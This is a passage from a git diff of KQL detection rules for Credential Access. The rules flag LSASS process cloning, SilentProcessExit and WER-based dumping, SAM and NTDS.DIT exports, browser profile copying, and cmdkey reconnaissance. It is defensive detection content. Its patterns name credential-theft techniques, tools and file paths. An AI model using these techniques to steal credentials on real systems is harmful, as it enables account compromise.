and (FolderPath endswith "\\appcmd.exe" or ProcessVersionInfoOriginalFileName =~ "appcmd.exe")) and ((ProcessCommandLine contains " /config" or ProcessCommandLine contains " /xml" or ProcessCommandLine contains " -config" or ProcessCommandLine contains " -xml") or ((ProcessCommandLine contains " /@t" or ProcessCommandLine contains " /text" or ProcessCommandLine contains " /show" or ProcessCommandLine contains " -@t" or ProcessCommandLine contains " -text" or ProcessCommandLine contains " -show") and (ProcessCommandLine contains ":*" or ProcessCommandLine contains "password"))) \ No newline at end of file diff --git a/KQL/rules/Credential Access/microsoft_teams_sensitive_file_access_by_uncommon_applications.kql b/KQL/rules/Credential Access/microsoft_teams_sensitive_file_access_by_uncommon_applications.kql index 447f1f17..5c885f46 100644 --- a/KQL/rules/Credential Access/microsoft_teams_sensitive_file_access_by_uncommon_applications.kql +++ b/KQL/rules/Credential Access/microsoft_teams_sensitive_file_access_by_uncommon_applications.kql @@ -1,10 +1,10 @@ -// Title: Microsoft Teams Sensitive File Access By Uncommon Applications -// Author: @SerkinValery -// Date: 2024-07-22 -// Level: medium -// Description: Detects file access attempts to sensitive Microsoft teams files (leveldb, cookies) by an uncommon process. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1528 - -DeviceFileEvents +// Title: Microsoft Teams Sensitive File Access By Uncommon Applications +// Author: @SerkinValery +// Date: 2024-07-22 +// Level: medium +// Description: Detects file access attempts to sensitive Microsoft teams files (leveldb, cookies) by an uncommon process. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1528 + +DeviceFileEvents | where (FileName contains "\\Microsoft\\Teams\\Cookies" or FileName contains "\\Microsoft\\Teams\\Local Storage\\leveldb") and (not(InitiatingProcessFolderPath endswith "\\Microsoft\\Teams\\current\\Teams.exe")) \ No newline at end of file diff --git a/KQL/rules/Credential Access/mount_execution_with_hidepid_parameter.kql b/KQL/rules/Credential Access/mount_execution_with_hidepid_parameter.kql index 985f4f6f..051b1a74 100644 --- a/KQL/rules/Credential Access/mount_execution_with_hidepid_parameter.kql +++ b/KQL/rules/Credential Access/mount_execution_with_hidepid_parameter.kql @@ -1,10 +1,10 @@ -// Title: Mount Execution With Hidepid Parameter -// Author: Joseliyo Sanchez, @Joseliyo_Jstnk -// Date: 2023-01-12 -// Level: medium -// Description: Detects execution of the "mount" command with "hidepid" parameter to make invisible processes to other users from the system -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.defense-evasion, attack.t1564 - -DeviceProcessEvents +// Title: Mount Execution With Hidepid Parameter +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2023-01-12 +// Level: medium +// Description: Detects execution of the "mount" command with "hidepid" parameter to make invisible processes to other users from the system +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.defense-evasion, attack.t1564 + +DeviceProcessEvents | where (ProcessCommandLine contains "hidepid=2" and ProcessCommandLine contains " -o ") and FolderPath endswith "/mount" \ No newline at end of file diff --git a/KQL/rules/Credential Access/new_generic_credentials_added_via_cmdkey_exe.kql b/KQL/rules/Credential Access/new_generic_credentials_added_via_cmdkey_exe.kql index 7675a517..7f104c2a 100644 --- a/KQL/rules/Credential Access/new_generic_credentials_added_via_cmdkey_exe.kql +++ b/KQL/rules/Credential Access/new_generic_credentials_added_via_cmdkey_exe.kql @@ -1,13 +1,13 @@ -// Title: New Generic Credentials Added Via Cmdkey.EXE -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-02-03 -// Level: medium -// Description: Detects usage of "cmdkey.exe" to add generic credentials. -// As an example, this can be used before connecting to an RDP session via command line interface. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003.005 -// False Positives: -// - Legitimate usage for administration purposes - -DeviceProcessEvents +// Title: New Generic Credentials Added Via Cmdkey.EXE +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-03 +// Level: medium +// Description: Detects usage of "cmdkey.exe" to add generic credentials. +// As an example, this can be used before connecting to an RDP session via command line interface. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.005 +// False Positives: +// - Legitimate usage for administration purposes + +DeviceProcessEvents | where (ProcessCommandLine contains " -g" or ProcessCommandLine contains " /g" or ProcessCommandLine contains " –g" or ProcessCommandLine contains " —g" or ProcessCommandLine contains " ―g") and (ProcessCommandLine contains " -p" or ProcessCommandLine contains " /p" or ProcessCommandLine contains " –p" or ProcessCommandLine contains " —p" or ProcessCommandLine contains " ―p") and (ProcessCommandLine contains " -u" or ProcessCommandLine contains " /u" or ProcessCommandLine contains " –u" or ProcessCommandLine contains " —u" or ProcessCommandLine contains " ―u") and (FolderPath endswith "\\cmdkey.exe" or ProcessVersionInfoOriginalFileName =~ "cmdkey.exe") \ No newline at end of file diff --git a/KQL/rules/Credential Access/ntds_dit_created.kql b/KQL/rules/Credential Access/ntds_dit_created.kql index e2defb35..8340ad4a 100644 --- a/KQL/rules/Credential Access/ntds_dit_created.kql +++ b/KQL/rules/Credential Access/ntds_dit_created.kql @@ -1,10 +1,10 @@ -// Title: NTDS.DIT Created -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-05 -// Level: low -// Description: Detects creation of a file named "ntds.dit" (Active Directory Database) -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003.003 - -DeviceFileEvents +// Title: NTDS.DIT Created +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-05 +// Level: low +// Description: Detects creation of a file named "ntds.dit" (Active Directory Database) +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.003 + +DeviceFileEvents | where FolderPath endswith "ntds.dit" \ No newline at end of file diff --git a/KQL/rules/Credential Access/ntds_dit_creation_by_uncommon_parent_process.kql b/KQL/rules/Credential Access/ntds_dit_creation_by_uncommon_parent_process.kql index eba0d7ab..4fe8fd8c 100644 --- a/KQL/rules/Credential Access/ntds_dit_creation_by_uncommon_parent_process.kql +++ b/KQL/rules/Credential Access/ntds_dit_creation_by_uncommon_parent_process.kql @@ -1,10 +1,10 @@ -// Title: NTDS.DIT Creation By Uncommon Parent Process -// Author: Florian Roth (Nextron Systems) -// Date: 2022-03-11 -// Level: high -// Description: Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon parent process or directory -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003.003 - -DeviceFileEvents +// Title: NTDS.DIT Creation By Uncommon Parent Process +// Author: Florian Roth (Nextron Systems) +// Date: 2022-03-11 +// Level: high +// Description: Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon parent process or directory +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.003 + +DeviceFileEvents | where FolderPath endswith "\\ntds.dit" and ((InitiatingProcessParentFileName in~ ("cscript.exe", "httpd.exe", "nginx.exe", "php-cgi.exe", "powershell.exe", "pwsh.exe", "w3wp.exe", "wscript.exe")) or (InitiatingProcessParentFileName startswith "apache" or InitiatingProcessParentFileName startswith "tomcat" or InitiatingProcessParentFileName startswith "" or InitiatingProcessParentFileName startswith "" or InitiatingProcessParentFileName startswith "" or InitiatingProcessParentFileName startswith "")) \ No newline at end of file diff --git a/KQL/rules/Credential Access/ntds_dit_creation_by_uncommon_process.kql b/KQL/rules/Credential Access/ntds_dit_creation_by_uncommon_process.kql index a344ac8b..af5c1e7b 100644 --- a/KQL/rules/Credential Access/ntds_dit_creation_by_uncommon_process.kql +++ b/KQL/rules/Credential Access/ntds_dit_creation_by_uncommon_process.kql @@ -1,10 +1,10 @@ -// Title: NTDS.DIT Creation By Uncommon Process -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-01-11 -// Level: high -// Description: Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon process or a process located in a suspicious directory -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003.002, attack.t1003.003 - -DeviceFileEvents +// Title: NTDS.DIT Creation By Uncommon Process +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-01-11 +// Level: high +// Description: Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon process or a process located in a suspicious directory +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.002, attack.t1003.003 + +DeviceFileEvents | where FolderPath endswith "\\ntds.dit" and ((InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\wsl.exe" or InitiatingProcessFolderPath endswith "\\wt.exe") or (InitiatingProcessFolderPath contains "\\AppData\\" or InitiatingProcessFolderPath contains "\\Temp\\" or InitiatingProcessFolderPath contains "\\Public\\" or InitiatingProcessFolderPath contains "\\PerfLogs\\")) \ No newline at end of file diff --git a/KQL/rules/Credential Access/ntds_exfiltration_filename_patterns.kql b/KQL/rules/Credential Access/ntds_exfiltration_filename_patterns.kql index ff5cdac2..5bad4655 100644 --- a/KQL/rules/Credential Access/ntds_exfiltration_filename_patterns.kql +++ b/KQL/rules/Credential Access/ntds_exfiltration_filename_patterns.kql @@ -1,10 +1,10 @@ -// Title: NTDS Exfiltration Filename Patterns -// Author: Florian Roth (Nextron Systems) -// Date: 2022-03-11 -// Level: high -// Description: Detects creation of files with specific name patterns seen used in various tools that export the NTDS.DIT for exfiltration. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003.003 - -DeviceFileEvents +// Title: NTDS Exfiltration Filename Patterns +// Author: Florian Roth (Nextron Systems) +// Date: 2022-03-11 +// Level: high +// Description: Detects creation of files with specific name patterns seen used in various tools that export the NTDS.DIT for exfiltration. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.003 + +DeviceFileEvents | where FolderPath endswith "\\All.cab" or FolderPath endswith ".ntds.cleartext" \ No newline at end of file diff --git a/KQL/rules/Credential Access/permission_misconfiguration_reconnaissance_via_findstr_exe.kql b/KQL/rules/Credential Access/permission_misconfiguration_reconnaissance_via_findstr_exe.kql index ea618367..3e502fc9 100644 --- a/KQL/rules/Credential Access/permission_misconfiguration_reconnaissance_via_findstr_exe.kql +++ b/KQL/rules/Credential Access/permission_misconfiguration_reconnaissance_via_findstr_exe.kql @@ -1,11 +1,11 @@ -// Title: Permission Misconfiguration Reconnaissance Via Findstr.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-12 -// Level: medium -// Description: Detects usage of findstr with the "EVERYONE" or "BUILTIN" keywords. -// This was seen being used in combination with "icacls" and other utilities to spot misconfigured files or folders permissions. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1552.006 - -DeviceProcessEvents +// Title: Permission Misconfiguration Reconnaissance Via Findstr.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-12 +// Level: medium +// Description: Detects usage of findstr with the "EVERYONE" or "BUILTIN" keywords. +// This was seen being used in combination with "icacls" and other utilities to spot misconfigured files or folders permissions. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1552.006 + +DeviceProcessEvents | where ((ProcessCommandLine contains "\"Everyone\"" or ProcessCommandLine contains "'Everyone'" or ProcessCommandLine contains "\"BUILTIN\\\"" or ProcessCommandLine contains "'BUILTIN\\'") and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))) or (ProcessCommandLine contains "icacls " and ProcessCommandLine contains "findstr " and ProcessCommandLine contains "Everyone") \ No newline at end of file diff --git a/KQL/rules/Credential Access/potential_browser_data_stealing.kql b/KQL/rules/Credential Access/potential_browser_data_stealing.kql index a619e777..2f198cda 100644 --- a/KQL/rules/Credential Access/potential_browser_data_stealing.kql +++ b/KQL/rules/Credential Access/potential_browser_data_stealing.kql @@ -1,12 +1,12 @@ -// Title: Potential Browser Data Stealing -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-12-23 -// Level: medium -// Description: Adversaries may acquire credentials from web browsers by reading files specific to the target browser. -// Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. -// Web browsers typically store the credentials in an encrypted format within a credential store. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1555.003 - -DeviceProcessEvents +// Title: Potential Browser Data Stealing +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-12-23 +// Level: medium +// Description: Adversaries may acquire credentials from web browsers by reading files specific to the target browser. +// Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. +// Web browsers typically store the credentials in an encrypted format within a credential store. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1555.003 + +DeviceProcessEvents | where ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains "copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp " or ProcessCommandLine contains "move " or ProcessCommandLine contains "move-item" or ProcessCommandLine contains " mi " or ProcessCommandLine contains " mv ") or (FolderPath endswith "\\esentutl.exe" or FolderPath endswith "\\xcopy.exe" or FolderPath endswith "\\robocopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("esentutl.exe", "XCOPY.EXE", "robocopy.exe"))) and (ProcessCommandLine contains "\\Amigo\\User Data" or ProcessCommandLine contains "\\BraveSoftware\\Brave-Browser\\User Data" or ProcessCommandLine contains "\\CentBrowser\\User Data" or ProcessCommandLine contains "\\Chromium\\User Data" or ProcessCommandLine contains "\\CocCoc\\Browser\\User Data" or ProcessCommandLine contains "\\Comodo\\Dragon\\User Data" or ProcessCommandLine contains "\\Elements Browser\\User Data" or ProcessCommandLine contains "\\Epic Privacy Browser\\User Data" or ProcessCommandLine contains "\\Google\\Chrome Beta\\User Data" or ProcessCommandLine contains "\\Google\\Chrome SxS\\User Data" or ProcessCommandLine contains "\\Google\\Chrome\\User Data\\" or ProcessCommandLine contains "\\Kometa\\User Data" or ProcessCommandLine contains "\\Maxthon5\\Users" or ProcessCommandLine contains "\\Microsoft\\Edge\\User Data" or ProcessCommandLine contains "\\Mozilla\\Firefox\\Profiles" or ProcessCommandLine contains "\\Nichrome\\User Data" or ProcessCommandLine contains "\\Opera Software\\Opera GX Stable\\" or ProcessCommandLine contains "\\Opera Software\\Opera Neon\\User Data" or ProcessCommandLine contains "\\Opera Software\\Opera Stable\\" or ProcessCommandLine contains "\\Orbitum\\User Data" or ProcessCommandLine contains "\\QIP Surf\\User Data" or ProcessCommandLine contains "\\Sputnik\\User Data" or ProcessCommandLine contains "\\Torch\\User Data" or ProcessCommandLine contains "\\uCozMedia\\Uran\\User Data" or ProcessCommandLine contains "\\Vivaldi\\User Data") \ No newline at end of file diff --git a/KQL/rules/Credential Access/potential_credential_dumping_attempt_using_new_networkprovider_cli.kql b/KQL/rules/Credential Access/potential_credential_dumping_attempt_using_new_networkprovider_cli.kql index 6cee6571..c913f200 100644 --- a/KQL/rules/Credential Access/potential_credential_dumping_attempt_using_new_networkprovider_cli.kql +++ b/KQL/rules/Credential Access/potential_credential_dumping_attempt_using_new_networkprovider_cli.kql @@ -1,12 +1,12 @@ -// Title: Potential Credential Dumping Attempt Using New NetworkProvider - CLI -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-23 -// Level: high -// Description: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003 -// False Positives: -// - Other legitimate network providers used and not filtred in this rule - -DeviceProcessEvents +// Title: Potential Credential Dumping Attempt Using New NetworkProvider - CLI +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-23 +// Level: high +// Description: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003 +// False Positives: +// - Other legitimate network providers used and not filtred in this rule + +DeviceProcessEvents | where ProcessCommandLine contains "\\System\\CurrentControlSet\\Services\\" and ProcessCommandLine contains "\\NetworkProvider" \ No newline at end of file diff --git a/KQL/rules/Credential Access/potential_credential_dumping_attempt_using_new_networkprovider_reg.kql b/KQL/rules/Credential Access/potential_credential_dumping_attempt_using_new_networkprovider_reg.kql index cc0b9dd7..c5d6b1af 100644 --- a/KQL/rules/Credential Access/potential_credential_dumping_attempt_using_new_networkprovider_reg.kql +++ b/KQL/rules/Credential Access/potential_credential_dumping_attempt_using_new_networkprovider_reg.kql @@ -1,12 +1,12 @@ -// Title: Potential Credential Dumping Attempt Using New NetworkProvider - REG -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-23 -// Level: medium -// Description: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003 -// False Positives: -// - Other legitimate network providers used and not filtred in this rule - -DeviceRegistryEvents +// Title: Potential Credential Dumping Attempt Using New NetworkProvider - REG +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-23 +// Level: medium +// Description: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003 +// False Positives: +// - Other legitimate network providers used and not filtred in this rule + +DeviceRegistryEvents | where (RegistryKey endswith "\\System\\CurrentControlSet\\Services*" and RegistryKey contains "\\NetworkProvider") and (not(((RegistryKey contains "\\System\\CurrentControlSet\\Services\\WebClient\\NetworkProvider" or RegistryKey contains "\\System\\CurrentControlSet\\Services\\LanmanWorkstation\\NetworkProvider" or RegistryKey contains "\\System\\CurrentControlSet\\Services\\RDPNP\\NetworkProvider") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe"))) \ No newline at end of file diff --git a/KQL/rules/Credential Access/potential_credential_dumping_via_lsass_process_clone.kql b/KQL/rules/Credential Access/potential_credential_dumping_via_lsass_process_clone.kql index 3162f7cb..6650139b 100644 --- a/KQL/rules/Credential Access/potential_credential_dumping_via_lsass_process_clone.kql +++ b/KQL/rules/Credential Access/potential_credential_dumping_via_lsass_process_clone.kql @@ -1,10 +1,10 @@ -// Title: Potential Credential Dumping Via LSASS Process Clone -// Author: Florian Roth (Nextron Systems), Samir Bousseaden -// Date: 2021-11-27 -// Level: critical -// Description: Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003, attack.t1003.001 - -DeviceProcessEvents +// Title: Potential Credential Dumping Via LSASS Process Clone +// Author: Florian Roth (Nextron Systems), Samir Bousseaden +// Date: 2021-11-27 +// Level: critical +// Description: Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003, attack.t1003.001 + +DeviceProcessEvents | where FolderPath endswith "\\Windows\\System32\\lsass.exe" and InitiatingProcessFolderPath endswith "\\Windows\\System32\\lsass.exe" \ No newline at end of file diff --git a/KQL/rules/Credential Access/potential_credential_dumping_via_lsass_silentprocessexit_technique.kql b/KQL/rules/Credential Access/potential_credential_dumping_via_lsass_silentprocessexit_technique.kql index f49027a9..df0567dc 100644 --- a/KQL/rules/Credential Access/potential_credential_dumping_via_lsass_silentprocessexit_technique.kql +++ b/KQL/rules/Credential Access/potential_credential_dumping_via_lsass_silentprocessexit_technique.kql @@ -1,12 +1,12 @@ -// Title: Potential Credential Dumping Via LSASS SilentProcessExit Technique -// Author: Florian Roth (Nextron Systems) -// Date: 2021-02-26 -// Level: critical -// Description: Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003.001 -// False Positives: -// - Unlikely - -DeviceRegistryEvents +// Title: Potential Credential Dumping Via LSASS SilentProcessExit Technique +// Author: Florian Roth (Nextron Systems) +// Date: 2021-02-26 +// Level: critical +// Description: Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001 +// False Positives: +// - Unlikely + +DeviceRegistryEvents | where RegistryKey contains "Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\lsass.exe" \ No newline at end of file diff --git a/KQL/rules/Credential Access/potential_credential_dumping_via_wer.kql b/KQL/rules/Credential Access/potential_credential_dumping_via_wer.kql index 4c0c29b3..a5860a75 100644 --- a/KQL/rules/Credential Access/potential_credential_dumping_via_wer.kql +++ b/KQL/rules/Credential Access/potential_credential_dumping_via_wer.kql @@ -1,12 +1,12 @@ -// Title: Potential Credential Dumping Via WER -// Author: @pbssubhash , Nasreddine Bencherchali -// Date: 2022-12-08 -// Level: high -// Description: Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003.001 -// False Positives: -// - Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the "-p" parameter in the CommandLine. - -DeviceProcessEvents +// Title: Potential Credential Dumping Via WER +// Author: @pbssubhash , Nasreddine Bencherchali +// Date: 2022-12-08 +// Level: high +// Description: Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001 +// False Positives: +// - Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the "-p" parameter in the CommandLine. + +DeviceProcessEvents | where (((ProcessCommandLine contains " -u -p " and ProcessCommandLine contains " -ip " and ProcessCommandLine contains " -s ") and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI") and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")) and (FolderPath endswith "\\Werfault.exe" or ProcessVersionInfoOriginalFileName =~ "WerFault.exe")) and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\lsass.exe")) \ No newline at end of file diff --git a/KQL/rules/Credential Access/potential_network_sniffing_activity_using_network_tools.kql b/KQL/rules/Credential Access/potential_network_sniffing_activity_using_network_tools.kql index 716ca4a5..7790f853 100644 --- a/KQL/rules/Credential Access/potential_network_sniffing_activity_using_network_tools.kql +++ b/KQL/rules/Credential Access/potential_network_sniffing_activity_using_network_tools.kql @@ -1,14 +1,14 @@ -// Title: Potential Network Sniffing Activity Using Network Tools -// Author: Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems) -// Date: 2019-10-21 -// Level: medium -// Description: Detects potential network sniffing via use of network tools such as "tshark", "windump". -// Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. -// An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.discovery, attack.t1040 -// False Positives: -// - Legitimate administration activity to troubleshoot network issues - -DeviceProcessEvents +// Title: Potential Network Sniffing Activity Using Network Tools +// Author: Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-10-21 +// Level: medium +// Description: Detects potential network sniffing via use of network tools such as "tshark", "windump". +// Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. +// An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.discovery, attack.t1040 +// False Positives: +// - Legitimate administration activity to troubleshoot network issues + +DeviceProcessEvents | where (ProcessCommandLine contains "-i" and FolderPath endswith "\\tshark.exe") or FolderPath endswith "\\windump.exe" \ No newline at end of file diff --git a/KQL/rules/Credential Access/potential_powershell_console_history_access_attempt_via_history_file.kql b/KQL/rules/Credential Access/potential_powershell_console_history_access_attempt_via_history_file.kql index 3a9cb5be..f4ea56e5 100644 --- a/KQL/rules/Credential Access/potential_powershell_console_history_access_attempt_via_history_file.kql +++ b/KQL/rules/Credential Access/potential_powershell_console_history_access_attempt_via_history_file.kql @@ -1,13 +1,13 @@ -// Title: Potential PowerShell Console History Access Attempt via History File -// Author: Luc Génaux -// Date: 2025-04-03 -// Level: medium -// Description: Detects potential access attempts to the PowerShell console history directly via history file (ConsoleHost_history.txt). -// This can give access to plaintext passwords used in PowerShell commands or used for general reconnaissance. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1552.001 -// False Positives: -// - Legitimate access of the console history file is possible - -DeviceProcessEvents +// Title: Potential PowerShell Console History Access Attempt via History File +// Author: Luc Génaux +// Date: 2025-04-03 +// Level: medium +// Description: Detects potential access attempts to the PowerShell console history directly via history file (ConsoleHost_history.txt). +// This can give access to plaintext passwords used in PowerShell commands or used for general reconnaissance. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1552.001 +// False Positives: +// - Legitimate access of the console history file is possible + +DeviceProcessEvents | where ProcessCommandLine contains "ConsoleHost_history.txt" or ProcessCommandLine contains "(Get-PSReadLineOption).HistorySavePath" \ No newline at end of file diff --git a/KQL/rules/Credential Access/potential_reconnaissance_for_cached_credentials_via_cmdkey_exe.kql b/KQL/rules/Credential Access/potential_reconnaissance_for_cached_credentials_via_cmdkey_exe.kql index ed96ee5e..f996d3c3 100644 --- a/KQL/rules/Credential Access/potential_reconnaissance_for_cached_credentials_via_cmdkey_exe.kql +++ b/KQL/rules/Credential Access/potential_reconnaissance_for_cached_credentials_via_cmdkey_exe.kql @@ -1,12 +1,12 @@ -// Title: Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE -// Author: jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2019-01-16 -// Level: high -// Description: Detects usage of cmdkey to look for cached credentials on the system -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003.005 -// False Positives: -// - Legitimate administrative tasks - -DeviceProcessEvents +// Title: Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE +// Author: jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-01-16 +// Level: high +// Description: Detects usage of cmdkey to look for cached credentials on the system +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.005 +// False Positives: +// - Legitimate administrative tasks + +DeviceProcessEvents | where (ProcessCommandLine contains " -l" or ProcessCommandLine contains " /l" or ProcessCommandLine contains " –l" or ProcessCommandLine contains " —l" or ProcessCommandLine contains " ―l") and (FolderPath endswith "\\cmdkey.exe" or ProcessVersionInfoOriginalFileName =~ "cmdkey.exe") \ No newline at end of file diff --git a/KQL/rules/Credential Access/potential_sam_database_dump.kql b/KQL/rules/Credential Access/potential_sam_database_dump.kql index 1a870e9b..33c6c458 100644 --- a/KQL/rules/Credential Access/potential_sam_database_dump.kql +++ b/KQL/rules/Credential Access/potential_sam_database_dump.kql @@ -1,12 +1,12 @@ -// Title: Potential SAM Database Dump -// Author: Florian Roth (Nextron Systems) -// Date: 2022-02-11 -// Level: high -// Description: Detects the creation of files that look like exports of the local SAM (Security Account Manager) -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003.002 -// False Positives: -// - Rare cases of administrative activity - -DeviceFileEvents +// Title: Potential SAM Database Dump +// Author: Florian Roth (Nextron Systems) +// Date: 2022-02-11 +// Level: high +// Description: Detects the creation of files that look like exports of the local SAM (Security Account Manager) +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.002 +// False Positives: +// - Rare cases of administrative activity + +DeviceFileEvents | where (FolderPath endswith "\\Temp\\sam" or FolderPath endswith "\\sam.sav" or FolderPath endswith "\\Intel\\sam" or FolderPath endswith "\\sam.hive" or FolderPath endswith "\\Perflogs\\sam" or FolderPath endswith "\\ProgramData\\sam" or FolderPath endswith "\\Users\\Public\\sam" or FolderPath endswith "\\AppData\\Local\\sam" or FolderPath endswith "\\AppData\\Roaming\\sam" or FolderPath endswith "_ShadowSteal.zip" or FolderPath endswith "\\Documents\\SAM.export" or FolderPath endswith ":\\sam") or (FolderPath contains "\\hive_sam_" or FolderPath contains "\\sam.save" or FolderPath contains "\\sam.export" or FolderPath contains "\\~reg_sam.save" or FolderPath contains "\\sam_backup" or FolderPath contains "\\sam.bck" or FolderPath contains "\\sam.backup") \ No newline at end of file diff --git a/KQL/rules/Credential Access/potential_spn_enumeration_via_setspn_exe.kql b/KQL/rules/Credential Access/potential_spn_enumeration_via_setspn_exe.kql index 677efffa..98eb1efd 100644 --- a/KQL/rules/Credential Access/potential_spn_enumeration_via_setspn_exe.kql +++ b/KQL/rules/Credential Access/potential_spn_enumeration_via_setspn_exe.kql @@ -1,12 +1,12 @@ -// Title: Potential SPN Enumeration Via Setspn.EXE -// Author: Markus Neis, keepwatch -// Date: 2018-11-14 -// Level: medium -// Description: Detects service principal name (SPN) enumeration used for Kerberoasting -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1558.003 -// False Positives: -// - Administration activity - -DeviceProcessEvents +// Title: Potential SPN Enumeration Via Setspn.EXE +// Author: Markus Neis, keepwatch +// Date: 2018-11-14 +// Level: medium +// Description: Detects service principal name (SPN) enumeration used for Kerberoasting +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1558.003 +// False Positives: +// - Administration activity + +DeviceProcessEvents | where (ProcessCommandLine contains " -q " or ProcessCommandLine contains " /q ") and (FolderPath endswith "\\setspn.exe" or ProcessVersionInfoOriginalFileName =~ 